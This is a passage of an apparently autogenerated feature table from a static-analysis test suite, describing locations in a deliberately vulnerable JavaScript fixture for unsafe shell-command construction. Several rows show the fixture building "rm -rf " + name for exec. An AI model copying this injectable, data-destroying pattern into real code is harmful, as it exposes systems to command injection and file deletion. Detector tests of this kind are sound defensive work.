name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:10:11:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:22:11:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:18 | module.exports.foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:18 | module.exports.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:18 | module.exports.foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:22 | module. ... foo.bar | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:22 | module. ... foo.bar | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:14:22 | module. ... foo.bar | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:16:1 | module. ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:16:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:1:16:1 | module. ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:8:14:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:8:14:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:8:14:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:16:14:18 | foo | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:16:14:18 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:16:14:18 | foo | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:20:14:22 | bar | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:20:14:22 | bar | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:20:14:22 | bar | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | cp | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | this | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:14:25 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | 'arguments' object of anonymous function | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | exceptional return of anonymous function | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | functio ... OT OK\\n} | assignedToPropName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | return of anonymous function | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:26:16:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 